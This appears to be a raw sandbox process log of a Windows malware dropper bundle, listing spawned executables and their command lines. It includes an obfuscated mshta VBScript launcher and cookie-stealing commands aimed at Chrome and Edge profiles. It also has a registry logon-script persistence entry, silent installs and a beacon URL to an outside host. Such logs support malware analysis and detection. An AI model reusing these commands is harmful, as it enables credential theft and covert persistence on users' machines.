C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4496 -ip 4496
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3060 -ip 3060
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4476 -ip 4476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 236
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 296
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "jKLSPhadj6e2QQLlPuXVqGnE.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 8 -ip 8
C:\Users\Admin\AppData\Local\Temp\is-5JDP6.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5JDP6.tmp\Inlog.tmp" /SL5="$20376,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4676 -ip 4676
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 276
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5528 -ip 5528
C:\Users\Admin\AppData\Local\Temp\C583.exe
C:\Users\Admin\AppData\Local\Temp\C583.exe
C:\Users\Admin\AppData\Local\Temp\is-IKBKK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IKBKK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N8276.tmp\WEATHER Manager.tmp" /SL5="$70282,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-CEN4J.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CEN4J.tmp\VPN.tmp" /SL5="$60366,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp" /SL5="$302FC,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-IKBKK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Users\Admin\AppData\Local\Temp\D14C.exe
C:\Users\Admin\AppData\Local\Temp\D14C.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-FI5TK.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FI5TK.tmp\MediaBurner2.tmp" /SL5="$1046C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 1900 -ip 1900
C:\Users\Admin\AppData\Local\Temp\is-CGVL2.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-CGVL2.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1900 -s 2304
C:\Users\Admin\AppData\Local\Temp\E3DB.exe
C:\Users\Admin\AppData\Local\Temp\E3DB.exe
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Roaming\2734919.exe
"C:\Users\Admin\AppData\Roaming\2734919.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1992 -ip 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1368 -ip 1368
C:\Users\Admin\AppData\Roaming\4689318.exe
"C:\Users\Admin\AppData\Roaming\4689318.exe"
C:\Users\Admin\AppData\Roaming\3520134.exe
"C:\Users\Admin\AppData\Roaming\3520134.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 296
C:\Users\Admin\AppData\Roaming\6643716.exe
"C:\Users\Admin\AppData\Roaming\6643716.exe"
C:\Users\Admin\AppData\Roaming\1627520.exe
"C:\Users\Admin\AppData\Roaming\1627520.exe"
C:\Users\Admin\AppData\Local\Temp\tmpE187_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpE187_tmp.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\176.exe
C:\Users\Admin\AppData\Local\Temp\176.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4696 -ip 4696
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-QE5G6.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 1640
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\272F.exe
C:\Users\Admin\AppData\Local\Temp\272F.exe
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\AppData\Local\Temp\is-V609D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V609D.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-33RS1.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-33RS1.tmp\Setup.tmp" /SL5="$80282,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-V609D.tmp\Setup.exe" /silent /subid=720
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5A2054B3043C973B0886FEF2CADA1042 C
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\47F7.exe
C:\Users\Admin\AppData\Local\Temp\47F7.exe
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5384 -ip 5384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 296
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe
"C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe"
C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe
"C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe"
C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe
"C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe"
C:\Users\Admin\Documents\SfSbUta8c13qZO5oofZJ_k3x.exe
"C:\Users\Admin\Documents\SfSbUta8c13qZO5oofZJ_k3x.exe"
C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe
"C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe"
C:\Users\Admin\Documents\jvnotRt_isgC6pRQAPR1WOOx.exe
"C:\Users\Admin\Documents\jvnotRt_isgC6pRQAPR1WOOx.exe"
C:\Users\Admin\Documents\R5x8VcsZb2g9EEybRThwY1b2.exe
"C:\Users\Admin\Documents\R5x8VcsZb2g9EEybRThwY1b2.exe"
C:\Users\Admin\Documents\V1lAQxaN_FsGkrSpMea_jqZA.exe
"C:\Users\Admin\Documents\V1lAQxaN_FsGkrSpMea_jqZA.exe"
C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe
"C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe"
C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe
"C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe"
C:\Users\Admin\Documents\nGFdjZLe2WmMa0EAa2XH2mRh.exe
"C:\Users\Admin\Documents\nGFdjZLe2WmMa0EAa2XH2mRh.exe"
C:\Users\Admin\Documents\tZdAQU4iXHHyHrzKOooTZOno.exe
"C:\Users\Admin\Documents\tZdAQU4iXHHyHrzKOooTZOno.exe"
C:\Users\Admin\Documents\PCVKx7s5GpNAJMjxhBuYya0l.exe
"C:\Users\Admin\Documents\PCVKx7s5GpNAJMjxhBuYya0l.exe"
C:\Users\Admin\Documents\n5ih3nWiquA7N5FQcShlGmoc.exe
"C:\Users\Admin\Documents\n5ih3nWiquA7N5FQcShlGmoc.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8ADC9A5973483C6FD94EF5AAB2FDDF48 C
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\mmIvEx2IYQhRvIQ4Rync0mVj.exe
"C:\Users\Admin\Documents\mmIvEx2IYQhRvIQ4Rync0mVj.exe"
C:\Users\Admin\Documents\j3YysndFLFy99bv4IRorHW6c.exe
"C:\Users\Admin\Documents\j3YysndFLFy99bv4IRorHW6c.exe"
C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe
"C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\x7UGJTBAX0vBNDcavvut3FPo.exe
"C:\Users\Admin\Documents\x7UGJTBAX0vBNDcavvut3FPo.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 676 -p 3240 -ip 3240
C:\Users\Admin\Documents\4t2ivJzPEyAnSJkw5BmrPRF1.exe
"C:\Users\Admin\Documents\4t2ivJzPEyAnSJkw5BmrPRF1.exe"
C:\Users\Admin\Documents\bTeN5WbDrXBDlM0n_57seP1e.exe
"C:\Users\Admin\Documents\bTeN5WbDrXBDlM0n_57seP1e.exe"
C:\Users\Admin\Documents\S1tImuxOwNJDtbWSIFfTCppo.exe
"C:\Users\Admin\Documents\S1tImuxOwNJDtbWSIFfTCppo.exe"
C:\Users\Admin\Documents\JgZZrAUDPGCwO0Zly4OHXJg8.exe
"C:\Users\Admin\Documents\JgZZrAUDPGCwO0Zly4OHXJg8.exe"
C:\Users\Admin\Documents\w1mMNLX1vOG1MraOp5F91OnY.exe
"C:\Users\Admin\Documents\w1mMNLX1vOG1MraOp5F91OnY.exe"
C:\Users\Admin\Documents\B897mR3zE2X5FsFyEbOeB972.exe
"C:\Users\Admin\Documents\B897mR3zE2X5FsFyEbOeB972.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\9zhrqZQI9Rxvekvjca5GkoUy.exe
"C:\Users\Admin\Documents\9zhrqZQI9Rxvekvjca5GkoUy.exe"
C:\Users\Admin\AppData\Local\Temp\is-GDPLQ.tmp\w1mMNLX1vOG1MraOp5F91OnY.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GDPLQ.tmp\w1mMNLX1vOG1MraOp5F91OnY.tmp" /SL5="$1050A,138429,56832,C:\Users\Admin\Documents\w1mMNLX1vOG1MraOp5F91OnY.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3240 -s 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3712 -ip 3712
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1C221ED7C8CFA84621D2D4DA8645500D
C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe
"C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe" -q
C:\Users\Admin\AppData\Local\Temp\is-NF27V.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-NF27V.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 312
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files\Uninstall Information\CUZRCKRPQL\ultramediaburner.exe
"C:\Program Files\Uninstall Information\CUZRCKRPQL\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\a1-2bacf-8a3-cea95-771ddfbf7ddec\Haefytomugy.exe
"C:\Users\Admin\AppData\Local\Temp\a1-2bacf-8a3-cea95-771ddfbf7ddec\Haefytomugy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe
C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 8012 -ip 8012
C:\Users\Admin\AppData\Local\Temp\is-DL4O3.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DL4O3.tmp\ultramediaburner.tmp" /SL5="$505E0,281924,62464,C:\Program Files\Uninstall Information\CUZRCKRPQL\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe
C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe
C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe
"C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "vq1hSEH2lpS45RVDJRUCln0X.exe"
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2880 -ip 2880
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\72-8eff8-0d5-0b692-badc872059247\Nylaelahywi.exe
"C:\Users\Admin\AppData\Local\Temp\72-8eff8-0d5-0b692-badc872059247\Nylaelahywi.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
